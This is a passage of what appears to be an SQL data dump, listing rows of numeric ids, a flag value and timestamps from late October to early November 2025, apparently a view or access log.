11:51:29'),(93586,3060,1,'2025-10-29','2025-10-29 12:43:28'),(93587,1747,1,'2025-10-29','2025-10-29 12:43:46'),(93588,5454,1,'2025-10-29','2025-10-29 12:44:50'),(93589,3714,1,'2025-10-29','2025-10-29 12:45:55'),(93590,4514,1,'2025-10-29','2025-10-29 12:51:46'),(93591,2813,1,'2025-10-29','2025-10-29 12:54:21'),(93592,3781,1,'2025-10-29','2025-10-29 12:56:39'),(93593,2420,1,'2025-10-29','2025-10-29 13:05:10'),(93594,4950,1,'2025-10-29','2025-10-29 14:09:25'),(93595,3774,1,'2025-10-29','2025-10-29 14:14:37'),(93596,4703,1,'2025-10-29','2025-10-29 15:24:20'),(93597,3079,1,'2025-10-29','2025-10-29 15:34:15'),(93598,4326,1,'2025-10-29','2025-10-29 15:35:51'),(93599,3267,1,'2025-10-29','2025-10-29 15:59:13'),(93600,4238,1,'2025-10-29','2025-10-29 16:12:31'),(93601,4238,1,'2025-10-29','2025-10-29 16:19:30'),(93602,4238,1,'2025-10-29','2025-10-29 16:20:49'),(93603,5609,1,'2025-10-29','2025-10-29 16:27:40'),(93604,5146,1,'2025-10-29','2025-10-29 16:31:23'),(93605,3738,1,'2025-10-29','2025-10-29 17:12:17'),(93606,5502,1,'2025-10-29','2025-10-29 17:12:53'),(93607,3781,1,'2025-10-29','2025-10-29 17:22:54'),(93608,5406,1,'2025-10-29','2025-10-29 17:32:53'),(93609,5512,1,'2025-10-29','2025-10-29 17:35:35'),(93610,5457,1,'2025-10-29','2025-10-29 17:35:53'),(93611,1588,1,'2025-10-29','2025-10-29 17:36:28'),(93612,3489,1,'2025-10-29','2025-10-29 17:37:37'),(93613,4660,1,'2025-10-29','2025-10-29 17:41:23'),(93614,5454,1,'2025-10-29','2025-10-29 17:47:34'),(93615,5400,1,'2025-10-29','2025-10-29 17:47:54'),(93616,4529,1,'2025-10-29','2025-10-29 17:48:05'),(93617,5425,1,'2025-10-29','2025-10-29 17:50:24'),(93618,5412,1,'2025-10-29','2025-10-29 18:02:58'),(93619,5406,1,'2025-10-29','2025-10-29 18:06:10'),(93620,3117,1,'2025-10-29','2025-10-29 18:07:40'),(93621,2904,1,'2025-10-29','2025-10-29 18:10:09'),(93622,3038,1,'2025-10-29','2025-10-29 18:15:05'),(93623,1711,1,'2025-10-29','2025-10-29 18:15:08'),(93624,4332,1,'2025-10-29','2025-10-29 18:21:49'),(93625,3316,1,'2025-10-29','2025-10-29 18:27:53'),(93626,3045,1,'2025-10-29','2025-10-29 18:29:58'),(93627,4977,1,'2025-10-29','2025-10-29 18:30:04'),(93628,1604,1,'2025-10-29','2025-10-29 18:34:10'),(93629,72,1,'2025-10-29','2025-10-29 18:36:40'),(93630,5436,1,'2025-10-29','2025-10-29 18:37:18'),(93631,5420,1,'2025-10-29','2025-10-29 18:37:32'),(93632,5449,1,'2025-10-29','2025-10-29 18:37:35'),(93633,76,1,'2025-10-29','2025-10-29 18:41:54'),(93634,5461,1,'2025-10-29','2025-10-29 18:50:26'),(93635,3486,1,'2025-10-29','2025-10-29 18:54:51'),(93636,5492,1,'2025-10-29','2025-10-29 18:55:58'),(93637,110,1,'2025-10-29','2025-10-29 19:00:25'),(93638,5464,1,'2025-10-29','2025-10-29 19:05:04'),(93639,4517,1,'2025-10-29','2025-10-29 19:21:16'),(93640,4827,1,'2025-10-29','2025-10-29 19:35:43'),(93641,2813,1,'2025-10-29','2025-10-29 20:23:39'),(93642,4688,1,'2025-10-29','2025-10-29 21:23:21'),(93643,4238,1,'2025-10-29','2025-10-29 22:49:19'),(93644,4556,1,'2025-10-29','2025-10-29 23:03:27'),(93645,3749,1,'2025-10-29','2025-10-29 23:43:27'),(93646,3534,1,'2025-10-29','2025-10-29 23:43:35'),(93647,4744,1,'2025-10-29','2025-10-29 23:50:20'),(93648,4648,1,'2025-10-30','2025-10-30 00:19:27'),(93649,5397,1,'2025-10-30','2025-10-30 00:30:07'),(93650,4524,1,'2025-10-30','2025-10-30 00:43:55'),(93651,3749,1,'2025-10-30','2025-10-30 01:19:36'),(93652,3746,1,'2025-10-30','2025-10-30 01:30:25'),(93653,5570,1,'2025-10-30','2025-10-30 01:54:34'),(93654,4323,1,'2025-10-30','2025-10-30 02:33:19'),(93655,5449,1,'2025-10-30','2025-10-30 02:53:03'),(93656,1582,1,'2025-10-30','2025-10-30 02:59:41'),(93657,2813,1,'2025-10-30','2025-10-30 03:21:45'),(93658,4341,1,'2025-10-30','2025-10-30 03:22:10'),(93659,3259,1,'2025-10-30','2025-10-30 03:31:24'),(93660,3438,1,'2025-10-30','2025-10-30 03:32:21'),(93661,1582,1,'2025-10-30','2025-10-30 03:38:19'),(93662,5163,1,'2025-10-30','2025-10-30 03:41:56'),(93663,2989,1,'2025-10-30','2025-10-30 04:51:22'),(93664,74,1,'2025-10-30','2025-10-30 05:27:06'),(93665,68,1,'2025-10-30','2025-10-30 05:27:54'),(93666,91,1,'2025-10-30','2025-10-30 05:29:20'),(93667,335,1,'2025-10-30','2025-10-30 05:29:50'),(93668,91,1,'2025-10-30','2025-10-30 05:31:30'),(93669,68,1,'2025-10-30','2025-10-30 05:31:46'),(93670,5400,1,'2025-10-30','2025-10-30 05:38:52'),(93671,1766,1,'2025-10-30','2025-10-30 05:44:57'),(93672,1728,1,'2025-10-30','2025-10-30 06:19:25'),(93673,4454,1,'2025-10-30','2025-10-30 06:39:08'),(93674,468,1,'2025-10-30','2025-10-30 06:46:06'),(93675,1711,1,'2025-10-30','2025-10-30 06:49:42'),(93676,1604,1,'2025-10-30','2025-10-30 06:55:29'),(93677,4400,1,'2025-10-30','2025-10-30 06:57:54'),(93678,1608,1,'2025-10-30','2025-10-30 07:47:32'),(93679,5441,1,'2025-10-30','2025-10-30 07:51:55'),(93680,1737,1,'2025-10-30','2025-10-30 08:14:23'),(93681,3691,1,'2025-10-30','2025-10-30 08:21:17'),(93682,2804,1,'2025-10-30','2025-10-30 08:28:57'),(93683,2148,1,'2025-10-30','2025-10-30 08:30:36'),(93684,3313,1,'2025-10-30','2025-10-30 08:39:31'),(93685,5397,1,'2025-10-30','2025-10-30 08:41:32'),(93686,3066,1,'2025-10-30','2025-10-30 08:49:06'),(93687,4950,1,'2025-10-30','2025-10-30 09:03:07'),(93688,4950,1,'2025-10-30','2025-10-30 09:06:03'),(93689,2911,1,'2025-10-30','2025-10-30 09:13:05'),(93690,5163,1,'2025-10-30','2025-10-30 09:20:55'),(93691,1701,1,'2025-10-30','2025-10-30 09:29:16'),(93692,4950,1,'2025-10-30','2025-10-30 10:23:37'),(93693,5397,1,'2025-10-30','2025-10-30 10:39:41'),(93694,80,1,'2025-10-30','2025-10-30 10:46:59'),(93695,91,1,'2025-10-30','2025-10-30 10:53:39'),(93696,4238,1,'2025-10-30','2025-10-30 11:46:07'),(93697,5433,1,'2025-10-30','2025-10-30 11:56:36'),(93698,3282,1,'2025-10-30','2025-10-30 12:27:24'),(93699,4963,1,'2025-10-30','2025-10-30 12:53:09'),(93700,1772,1,'2025-10-30','2025-10-30 13:09:19'),(93701,3249,1,'2025-10-30','2025-10-30 13:22:22'),(93702,5449,1,'2025-10-30','2025-10-30 13:24:31'),(93703,5420,1,'2025-10-30','2025-10-30 13:30:16'),(93704,1745,1,'2025-10-30','2025-10-30 13:33:51'),(93705,5071,1,'2025-10-30','2025-10-30 13:47:57'),(93706,3282,1,'2025-10-30','2025-10-30 14:14:10'),(93707,80,1,'2025-10-30','2025-10-30 15:00:39'),(93708,84,1,'2025-10-30','2025-10-30 16:00:58'),(93709,3738,1,'2025-10-30','2025-10-30 16:18:36'),(93710,2159,1,'2025-10-30','2025-10-30 16:19:25'),(93711,2658,1,'2025-10-30','2025-10-30 17:16:21'),(93712,80,1,'2025-10-30','2025-10-30 17:20:04'),(93713,1707,1,'2025-10-30','2025-10-30 17:24:07'),(93714,5449,1,'2025-10-30','2025-10-30 17:24:28'),(93715,80,1,'2025-10-30','2025-10-30 17:33:55'),(93716,1711,1,'2025-10-30','2025-10-30 17:37:19'),(93717,3280,1,'2025-10-30','2025-10-30 18:21:46'),(93718,1724,1,'2025-10-30','2025-10-30 18:34:24'),(93719,2154,1,'2025-10-30','2025-10-30 18:35:02'),(93720,3265,1,'2025-10-30','2025-10-30 18:35:40'),(93721,2248,1,'2025-10-30','2025-10-30 18:35:49'),(93722,84,1,'2025-10-30','2025-10-30 19:25:08'),(93723,1695,1,'2025-10-30','2025-10-30 19:28:27'),(93724,4944,1,'2025-10-30','2025-10-30 19:31:04'),(93725,5163,1,'2025-10-30','2025-10-30 20:20:08'),(93726,3104,1,'2025-10-30','2025-10-30 20:25:18'),(93727,469,1,'2025-10-30','2025-10-30 20:26:52'),(93728,3243,1,'2025-10-30','2025-10-30 21:15:32'),(93729,3096,1,'2025-10-30','2025-10-30 21:17:17'),(93730,5549,1,'2025-10-30','2025-10-30 21:46:37'),(93731,2704,1,'2025-10-30','2025-10-30 22:02:16'),(93732,5457,1,'2025-10-30','2025-10-30 22:09:25'),(93733,3226,1,'2025-10-30','2025-10-30 22:29:49'),(93734,3282,1,'2025-10-30','2025-10-30 23:18:10'),(93735,3297,1,'2025-10-30','2025-10-30 23:23:41'),(93736,1774,1,'2025-10-30','2025-10-30 23:26:13'),(93737,2993,1,'2025-10-30','2025-10-30 23:26:24'),(93738,3102,1,'2025-10-30','2025-10-30 23:29:45'),(93739,4963,1,'2025-10-30','2025-10-30 23:31:42'),(93740,5397,1,'2025-10-30','2025-10-30 23:58:47'),(93741,3541,1,'2025-10-31','2025-10-31 00:22:30'),(93742,3531,1,'2025-10-31','2025-10-31 00:24:36'),(93743,467,1,'2025-10-31','2025-10-31 00:53:13'),(93744,4396,1,'2025-10-31','2025-10-31 01:01:14'),(93745,80,1,'2025-10-31','2025-10-31 01:12:27'),(93746,2156,1,'2025-10-31','2025-10-31 01:17:25'),(93747,2293,1,'2025-10-31','2025-10-31 01:17:46'),(93748,3107,1,'2025-10-31','2025-10-31 01:22:24'),(93749,3269,1,'2025-10-31','2025-10-31 03:31:39'),(93750,1749,1,'2025-10-31','2025-10-31 03:34:03'),(93751,3257,1,'2025-10-31','2025-10-31 03:35:53'),(93752,2658,1,'2025-10-31','2025-10-31 04:03:01'),(93753,76,1,'2025-10-31','2025-10-31 04:07:40'),(93754,4520,1,'2025-10-31','2025-10-31 04:30:27'),(93755,1701,1,'2025-10-31','2025-10-31 04:34:52'),(93756,1697,1,'2025-10-31','2025-10-31 05:24:28'),(93757,1770,1,'2025-10-31','2025-10-31 05:26:10'),(93758,472,1,'2025-10-31','2025-10-31 05:26:21'),(93759,2813,1,'2025-10-31','2025-10-31 06:01:02'),(93760,3097,1,'2025-10-31','2025-10-31 07:14:17'),(93761,3034,1,'2025-10-31','2025-10-31 07:15:55'),(93762,3023,1,'2025-10-31','2025-10-31 07:20:13'),(93763,2704,1,'2025-10-31','2025-10-31 08:02:52'),(93764,5400,1,'2025-10-31','2025-10-31 08:19:45'),(93765,4950,1,'2025-10-31','2025-10-31 08:26:25'),(93766,2813,1,'2025-10-31','2025-10-31 08:42:36'),(93767,5454,1,'2025-10-31','2025-10-31 09:02:00'),(93768,3285,1,'2025-10-31','2025-10-31 10:16:02'),(93769,91,1,'2025-10-31','2025-10-31 11:12:33'),(93770,1544,1,'2025-10-31','2025-10-31 11:14:20'),(93771,3083,1,'2025-10-31','2025-10-31 12:05:11'),(93772,76,1,'2025-10-31','2025-10-31 12:05:57'),(93773,68,1,'2025-10-31','2025-10-31 12:06:16'),(93774,4930,1,'2025-10-31','2025-10-31 12:06:33'),(93775,3083,1,'2025-10-31','2025-10-31 12:07:22'),(93776,483,1,'2025-10-31','2025-10-31 12:16:36'),(93777,2161,1,'2025-10-31','2025-10-31 12:16:46'),(93778,1715,1,'2025-10-31','2025-10-31 12:17:22'),(93779,2801,1,'2025-10-31','2025-10-31 12:23:57'),(93780,4950,1,'2025-10-31','2025-10-31 12:53:25'),(93781,1594,1,'2025-10-31','2025-10-31 12:57:13'),(93782,1877,1,'2025-10-31','2025-10-31 13:21:19'),(93783,2813,1,'2025-10-31','2025-10-31 13:34:51'),(93784,4950,1,'2025-10-31','2025-10-31 13:44:19'),(93785,5522,1,'2025-10-31','2025-10-31 13:44:34'),(93786,2178,1,'2025-10-31','2025-10-31 14:15:09'),(93787,4950,1,'2025-10-31','2025-10-31 15:11:41'),(93788,485,1,'2025-10-31','2025-10-31 15:15:28'),(93789,1772,1,'2025-10-31','2025-10-31 15:18:45'),(93790,4950,1,'2025-10-31','2025-10-31 15:44:37'),(93791,4966,1,'2025-10-31','2025-10-31 16:06:00'),(93792,4771,1,'2025-10-31','2025-10-31 16:22:29'),(93793,3253,1,'2025-10-31','2025-10-31 16:22:44'),(93794,80,1,'2025-10-31','2025-10-31 16:23:24'),(93795,5428,1,'2025-10-31','2025-10-31 16:38:49'),(93796,5570,1,'2025-10-31','2025-10-31 16:46:57'),(93797,3083,1,'2025-10-31','2025-10-31 16:51:50'),(93798,5626,1,'2025-10-31','2025-10-31 17:04:32'),(93799,5626,1,'2025-10-31','2025-10-31 17:06:44'),(93800,5502,1,'2025-10-31','2025-10-31 17:12:48'),(93801,3307,1,'2025-10-31','2025-10-31 17:14:43'),(93802,4950,1,'2025-10-31','2025-10-31 17:17:54'),(93803,1718,1,'2025-10-31','2025-10-31 17:18:05'),(93804,5626,1,'2025-10-31','2025-10-31 17:23:02'),(93805,5397,1,'2025-10-31','2025-10-31 17:23:36'),(93806,5433,1,'2025-10-31','2025-10-31 17:25:45'),(93807,5570,1,'2025-10-31','2025-10-31 17:41:29'),(93808,5454,1,'2025-10-31','2025-10-31 17:44:02'),(93809,5626,1,'2025-10-31','2025-10-31 17:47:08'),(93810,5406,1,'2025-10-31','2025-10-31 18:06:10'),(93811,3117,1,'2025-10-31','2025-10-31 18:09:03'),(93812,2904,1,'2025-10-31','2025-10-31 18:11:32'),(93813,3038,1,'2025-10-31','2025-10-31 18:13:06'),(93814,5409,1,'2025-10-31','2025-10-31 18:13:12'),(93815,5441,1,'2025-10-31','2025-10-31 18:14:36'),(93816,3777,1,'2025-10-31','2025-10-31 18:29:46'),(93817,3664,1,'2025-10-31','2025-10-31 18:33:28'),(93818,72,1,'2025-10-31','2025-10-31 18:38:41'),(93819,4983,1,'2025-10-31','2025-10-31 18:50:24'),(93820,5461,1,'2025-10-31','2025-10-31 18:52:16'),(93821,3486,1,'2025-10-31','2025-10-31 18:52:28'),(93822,5492,1,'2025-10-31','2025-10-31 18:54:45'),(93823,4712,1,'2025-10-31','2025-10-31 19:03:20'),(93824,4681,1,'2025-10-31','2025-10-31 19:05:07'),(93825,5626,1,'2025-10-31','2025-10-31 19:49:21'),(93826,5626,1,'2025-10-31','2025-10-31 20:04:59'),(93827,4338,1,'2025-10-31','2025-10-31 20:22:58'),(93828,3694,1,'2025-10-31','2025-10-31 20:23:08'),(93829,1711,1,'2025-10-31','2025-10-31 20:26:34'),(93830,3271,1,'2025-10-31','2025-10-31 20:31:00'),(93831,1877,1,'2025-10-31','2025-10-31 20:32:13'),(93832,5626,1,'2025-10-31','2025-10-31 20:54:02'),(93833,1544,1,'2025-10-31','2025-10-31 21:28:35'),(93834,87,1,'2025-10-31','2025-10-31 22:19:55'),(93835,477,1,'2025-10-31','2025-10-31 22:20:49'),(93836,2503,1,'2025-10-31','2025-10-31 22:21:22'),(93837,91,1,'2025-10-31','2025-10-31 22:21:57'),(93838,5415,1,'2025-10-31','2025-10-31 22:23:27'),(93839,481,1,'2025-10-31','2025-10-31 23:02:01'),(93840,4651,1,'2025-10-31','2025-10-31 23:02:08'),(93841,3240,1,'2025-10-31','2025-10-31 23:02:17'),(93842,3083,1,'2025-10-31','2025-10-31 23:37:09'),(93843,482,1,'2025-10-31','2025-10-31 23:49:39'),(93844,3072,1,'2025-10-31','2025-10-31 23:49:45'),(93845,3092,1,'2025-10-31','2025-10-31 23:49:55'),(93846,1780,1,'2025-10-31','2025-10-31 23:53:14'),(93847,1604,1,'2025-11-01','2025-11-01 00:05:57'),(93848,5553,1,'2025-11-01','2025-11-01 00:19:02'),(93849,5618,1,'2025-11-01','2025-11-01 00:19:02'),(93850,5582,1,'2025-11-01','2025-11-01 00:29:01'),(93851,1703,1,'2025-11-01','2025-11-01 00:51:47'),(93852,5614,1,'2025-11-01','2025-11-01 00:56:21'),(93853,5622,1,'2025-11-01','2025-11-01 01:07:44'),(93854,4750,1,'2025-11-01','2025-11-01 01:22:33'),(93855,3079,1,'2025-11-01','2025-11-01 01:31:13'),(93856,3251,1,'2025-11-01','2025-11-01 01:40:36'),(93857,5545,1,'2025-11-01','2025-11-01 02:13:12'),(93858,2297,1,'2025-11-01','2025-11-01 02:29:29'),(93859,5614,1,'2025-11-01','2025-11-01 02:32:54'),(93860,4654,1,'2025-11-01','2025-11-01 03:01:11'),(93861,3482,1,'2025-11-01','2025-11-01 04:02:38'),(93862,5626,1,'2025-11-01','2025-11-01 04:25:20'),(93863,4950,1,'2025-11-01','2025-11-01 04:28:16'),(93864,2503,1,'2025-11-01','2025-11-01 04:47:41'),(93865,4489,1,'2025-11-01','2025-11-01 05:46:09'),(93866,1877,1,'2025-11-01','2025-11-01 05:46:52'),(93867,1774,1,'2025-11-01','2025-11-01 05:58:34'),(93868,84,1,'2025-11-01','2025-11-01 06:05:46'),(93869,5553,1,'2025-11-01','2025-11-01 06:27:46'),(93870,4709,1,'2025-11-01','2025-11-01 07:03:02'),(93871,5140,1,'2025-11-01','2025-11-01 07:12:36'),(93872,3673,1,'2025-11-01','2025-11-01 07:27:15'),(93873,4950,1,'2025-11-01','2025-11-01 07:27:34'),(93874,5618,1,'2025-11-01','2025-11-01 07:42:38'),(93875,1594,1,'2025-11-01','2025-11-01 08:32:39'),(93876,5593,1,'2025-11-01','2025-11-01 08:38:55'),(93877,4637,1,'2025-11-01','2025-11-01 09:05:18'),(93878,2813,1,'2025-11-01','2025-11-01 09:11:36'),(93879,2410,1,'2025-11-01','2025-11-01 09:57:58'),(93880,4238,1,'2025-11-01','2025-11-01 10:17:04'),(93881,4238,1,'2025-11-01','2025-11-01 10:25:58'),(93882,4357,1,'2025-11-01','2025-11-01 11:21:58'),(93883,5499,1,'2025-11-01','2025-11-01 11:22:10'),(93884,4436,1,'2025-11-01','2025-11-01 11:22:23'),(93885,91,1,'2025-11-01','2025-11-01 11:33:11'),(93886,3585,1,'2025-11-01','2025-11-01 12:17:58'),(93887,3777,1,'2025-11-01','2025-11-01 13:19:50'),(93888,76,1,'2025-11-01','2025-11-01 13:21:00'),(93889,479,1,'2025-11-01','2025-11-01 13:21:08'),(93890,5605,1,'2025-11-01','2025-11-01 14:12:12'),(93891,5585,1,'2025-11-01','2025-11-01 14:20:53'),(93892,5585,1,'2025-11-01','2025-11-01 14:20:58'),(93893,5593,1,'2025-11-01','2025-11-01 14:26:12'),(93894,80,1,'2025-11-01','2025-11-01 14:29:05'),(93895,4830,1,'2025-11-01','2025-11-01 14:30:25'),(93896,3180,1,'2025-11-01','2025-11-01 14:30:36'),(93897,2150,1,'2025-11-01','2025-11-01 14:30:47'),(93898,2558,1,'2025-11-01','2025-11-01 15:45:25'),(93899,3056,1,'2025-11-01','2025-11-01 15:51:11'),(93900,68,1,'2025-11-01','2025-11-01 16:13:01'),(93901,2769,1,'2025-11-01','2025-11-01 16:21:08'),(93902,1713,1,'2025-11-01','2025-11-01 16:25:57'),(93903,3698,1,'2025-11-01','2025-11-01 16:26:12'),(93904,4416,1,'2025-11-01','2025-11-01 16:36:24'),(93905,3297,1,'2025-11-01','2025-11-01 16:54:56'),(93906,3790,1,'2025-11-01','2025-11-01 17:04:25'),(93907,3307,1,'2025-11-01','2025-11-01 17:14:27'),(93908,3781,1,'2025-11-01','2025-11-01 17:19:20'),(93909,4719,1,'2025-11-01','2025-11-01 17:21:46'),(93910,5433,1,'2025-11-01','2025-11-01 17:25:01'),(93911,5397,1,'2025-11-01','2025-11-01 17:25:08'),(93912,5515,1,'2025-11-01','2025-11-01 17:26:49'),(93913,5512,1,'2025-11-01','2025-11-01 17:36:14'),(93914,5457,1,'2025-11-01','2025-11-01 17:36:29'),(93915,3267,1,'2025-11-01','2025-11-01 17:36:59'),(93916,5578,1,'2025-11-01','2025-11-01 17:58:31'),(93917,4722,1,'2025-11-01','2025-11-01 18:04:06'),(93918,4837,1,'2025-11-01','2025-11-01 18:08:31'),(93919,5406,1,'2025-11-01','2025-11-01 18:09:36'),(93920,3117,1,'2025-11-01','2025-11-01 18:10:31'),(93921,5428,1,'2025-11-01','2025-11-01 18:13:46'),(93922,5125,1,'2025-11-01','2025-11-01 18:14:49'),(93923,5441,1,'2025-11-01','2025-11-01 18:18:08'),(93924,1726,1,'2025-11-01','2025-11-01 18:23:22'),(93925,5518,1,'2025-11-01','2025-11-01 18:27:57'),(93926,5436,1,'2025-11-01','2025-11-01 18:38:20'),(93927,5420,1,'2025-11-01','2025-11-01 18:41:44'),(93928,3041,1,'2025-11-01','2025-11-01 18:42:23'),(93929,4496,1,'2025-11-01','2025-11-01 18:42:31'),(93930,4983,1,'2025-11-01','2025-11-01 18:46:37'),(93931,3486,1,'2025-11-01','2025-11-01 18:54:07'),(93932,5337,1,'2025-11-01','2025-11-01 18:54:39'),(93933,5492,1,'2025-11-01','2025-11-01 18:59:55'),(93934,2395,1,'2025-11-01','2025-11-01 19:01:20'),(93935,5436,1,'2025-11-01','2025-11-01 19:03:15'),(93936,5420,1,'2025-11-01','2025-11-01 19:03:29'),(93937,4681,1,'2025-11-01','2025-11-01 19:05:33'),(93938,4712,1,'2025-11-01','2025-11-01 19:06:48'),(93939,468,1,'2025-11-01','2025-11-01 19:06:56'),(93940,4546,1,'2025-11-01','2025-11-01 19:15:57'),(93941,2751,1,'2025-11-01','2025-11-01 19:32:13'),(93942,3045,1,'2025-11-01','2025-11-01 20:00:53'),(93943,5626,1,'2025-11-01','2025-11-01 20:13:16'),(93944,4363,1,'2025-11-01','2025-11-01 20:20:43'),(93945,3675,1,'2025-11-01','2025-11-01 20:26:39'),(93946,5626,1,'2025-11-01','2025-11-01 20:27:33'),(93947,1705,1,'2025-11-01','2025-11-01 21:11:22'),(93948,4765,1,'2025-11-01','2025-11-01 21:20:38'),(93949,4428,1,'2025-11-01','2025-11-01 21:24:04'),(93950,3175,1,'2025-11-01','2025-11-01 21:26:37'),(93951,1612,1,'2025-11-01','2025-11-01 21:34:55'),(93952,4747,1,'2025-11-01','2025-11-01 21:48:10'),(93953,1588,1,'2025-11-01','2025-11-01 22:00:00'),(93954,1544,1,'2025-11-01','2025-11-01 22:23:42'),(93955,487,1,'2025-11-01','2025-11-01 22:39:06'),(93956,4551,1,'2025-11-01','2025-11-01 22:43:50'),(93957,4842,1,'2025-11-01','2025-11-01 22:57:06'),(93958,4639,1,'2025-11-01','2025-11-01 23:15:25'),(93959,1870,1,'2025-11-01','2025-11-01 23:22:02'),(93960,4706,1,'2025-11-01','2025-11-01 23:22:10'),(93961,4329,1,'2025-11-01','2025-11-01 23:22:38'),(93962,4654,1,'2025-11-01','2025-11-01 23:24:32'),(93963,4768,1,'2025-11-01','2025-11-01 23:55:55'),(93964,1722,1,'2025-11-02','2025-11-02 00:01:37'),(93965,2658,1,'2025-11-02','2025-11-02 00:21:42'),(93966,2775,1,'2025-11-02','2025-11-02 00:42:01'),(93967,5353,1,'2025-11-02','2025-11-02 01:20:11'),(93968,91,1,'2025-11-02','2025-11-02 01:22:26'),(93969,4830,1,'2025-11-02','2025-11-02 01:28:59'),(93970,5507,1,'2025-11-02','2025-11-02 01:39:29'),(93971,1778,1,'2025-11-02','2025-11-02 01:42:19'),(93972,2769,1,'2025-11-02','2025-11-02 01:50:19'),(93973,4980,1,'2025-11-02','2025-11-02 01:50:24'),(93974,5476,1,'2025-11-02','2025-11-02 02:04:04'),(93975,1703,1,'2025-11-02','2025-11-02 02:08:19'),(93976,4759,1,'2025-11-02','2025-11-02 02:21:23'),(93977,3066,1,'2025-11-02','2025-11-02 02:25:33'),(93978,4396,1,'2025-11-02','2025-11-02 02:27:33'),(93979,2150,1,'2025-11-02','2025-11-02 02:31:14'),(93980,5310,1,'2025-11-02','2025-11-02 02:31:19'),(93981,3104,1,'2025-11-02','2025-11-02 02:33:47'),(93982,3226,1,'2025-11-02','2025-11-02 02:34:23'),(93983,4457,1,'2025-11-02','2025-11-02 02:36:43'),(93984,4862,1,'2025-11-02','2025-11-02 02:40:59'),(93985,4960,1,'2025-11-02','2025-11-02 02:46:03'),(93986,469,1,'2025-11-02','2025-11-02 03:01:30'),(93987,4712,1,'2025-11-02','2025-11-02 03:02:41'),(93988,3240,1,'2025-11-02','2025-11-02 03:33:57'),(93989,5609,1,'2025-11-02','2025-11-02 03:37:53'),(93990,4976,1,'2025-11-02','2025-11-02 03:44:00'),(93991,5457,1,'2025-11-02','2025-11-02 03:47:13'),(93992,4517,1,'2025-11-02','2025-11-02 03:47:42'),(93993,5050,1,'2025-11-02','2025-11-02 04:07:59'),(93994,1582,1,'2025-11-02','2025-11-02 04:13:12'),(93995,3053,1,'2025-11-02','2025-11-02 04:15:49'),(93996,4556,1,'2025-11-02','2025-11-02 04:15:58'),(93997,2609,1,'2025-11-02','2025-11-02 04:16:08'),(93998,3790,1,'2025-11-02','2025-11-02 04:17:43'),(93999,3261,1,'2025-11-02','2025-11-02 04:20:54'),(94000,4332,1,'2025-11-02','2025-11-02 04:23:19'),(94001,4508,1,'2025-11-02','2025-11-02 04:23:21'),(94002,4404,1,'2025-11-02','2025-11-02 04:24:58'),(94003,5454,1,'2025-11-02','2025-11-02 04:43:45'),(94004,4326,1,'2025-11-02','2025-11-02 04:49:12'),(94005,3087,1,'2025-11-02','2025-11-02 05:17:40'),(94006,3180,1,'2025-11-02','2025-11-02 05:17:48'),(94007,1747,1,'2025-11-02','2025-11-02 05:26:01'),(94008,1741,1,'2025-11-02','2025-11-02 05:30:15'),(94009,4938,1,'2025-11-02','2025-11-02 05:35:40'),(94010,76,1,'2025-11-02','2025-11-02 05:48:11'),(94011,1766,1,'2025-11-02','2025-11-02 05:57:01'),(94012,4771,1,'2025-11-02','2025-11-02 05:57:38'),(94013,3691,1,'2025-11-02','2025-11-02 06:07:12'),(94014,473,1,'2025-11-02','2025-11-02 06:15:12'),(94015,1782,1,'2025-11-02','2025-11-02 06:22:53'),(94016,474,1,'2025-11-02','2025-11-02 06:23:29'),(94017,470,1,'2025-11-02','2025-11-02 06:38:14'),(94018,4776,1,'2025-11-02','2025-11-02 06:45:34'),(94019,3664,1,'2025-11-02','2025-11-02 06:50:31'),(94020,5307,1,'2025-11-02','2025-11-02 06:56:04'),(94021,5334,1,'2025-11-02','2025-11-02 07:00:56'),(94022,1592,1,'2025-11-02','2025-11-02 07:06:15'),(94023,2617,1,'2025-11-02','2025-11-02 07:09:58'),(94024,3694,1,'2025-11-02','2025-11-02 07:14:06'),(94025,4377,1,'2025-11-02','2025-11-02 07:20:25'),(94026,1544,1,'2025-11-02','2025-11-02 07:21:49'),(94027,106,1,'2025-11-02','2025-11-02 07:23:39'),(94028,468,1,'2025-11-02','2025-11-02 07:25:57'),(94029,1586,1,'2025-11-02','2025-11-02 07:28:28'),(94030,3705,1,'2025-11-02','2025-11-02 07:28:30'),(94031,4960,1,'2025-11-02','2025-11-02 07:41:12'),(94032,4938,1,'2025-11-02','2025-11-02 07:50:31'),(94033,1586,1,'2025-11-02','2025-11-02 07:50:54'),(94034,1582,1,'2025-11-02','2025-11-02 07:58:05'),(94035,471,1,'2025-11-02','2025-11-02 08:11:29'),(94036,3178,1,'2025-11-02','2025-11-02 08:21:03'),(94037,2748,1,'2025-11-02','2025-11-02 08:21:11'),(94038,470,1,'2025-11-02','2025-11-02 08:23:25'),(94039,4496,1,'2025-11-02','2025-11-02 08:26:49'),(94040,4440,1,'2025-11-02','2025-11-02 08:28:51'),(94041,4420,1,'2025-11-02','2025-11-02 08:37:11'),(94042,5378,1,'2025-11-02','2025-11-02 08:38:19'),(94043,1732,1,'2025-11-02','2025-11-02 08:39:15'),(94044,1872,1,'2025-11-02','2025-11-02 09:18:40'),(94045,1732,1,'2025-11-02','2025-11-02 09:18:49'),(94046,467,1,'2025-11-02','2025-11-02 09:20:48'),(94047,1776,1,'2025-11-02','2025-11-02 09:22:51'),(94048,3253,1,'2025-11-02','2025-11-02 09:24:02'),(94049,3058,1,'2025-11-02','2025-11-02 09:24:59'),(94050,4348,1,'2025-11-02','2025-11-02 09:46:17'),(94051,477,1,'2025-11-02','2025-11-02 10:12:51'),(94052,3263,1,'2025-11-02','2025-11-02 10:25:57'),(94053,1705,1,'2025-11-02','2025-11-02 10:26:09'),(94054,1718,1,'2025-11-02','2025-11-02 10:38:59'),(94055,468,1,'2025-11-02','2025-11-02 11:21:28'),(94056,4779,1,'2025-11-02','2025-11-02 11:21:36'),(94057,4494,1,'2025-11-02','2025-11-02 11:24:50'),(94058,1745,1,'2025-11-02','2025-11-02 11:24:59'),(94059,91,1,'2025-11-02','2025-11-02 11:44:03'),(94060,4387,1,'2025-11-02','2025-11-02 11:49:44'),(94061,5323,1,'2025-11-02','2025-11-02 11:51:56'),(94062,4663,1,'2025-11-02','2025-11-02 11:59:29'),(94063,5467,1,'2025-11-02','2025-11-02 12:01:45'),(94064,4408,1,'2025-11-02','2025-11-02 12:07:20'),(94065,4977,1,'2025-11-02','2025-11-02 12:12:32'),(94066,4424,1,'2025-11-02','2025-11-02 12:21:38'),(94067,4654,1,'2025-11-02','2025-11-02 12:35:02'),(94068,2911,1,'2025-11-02','2025-11-02 13:16:18'),(94069,84,1,'2025-11-02','2025-11-02 13:38:00'),(94070,2457,1,'2025-11-02','2025-11-02 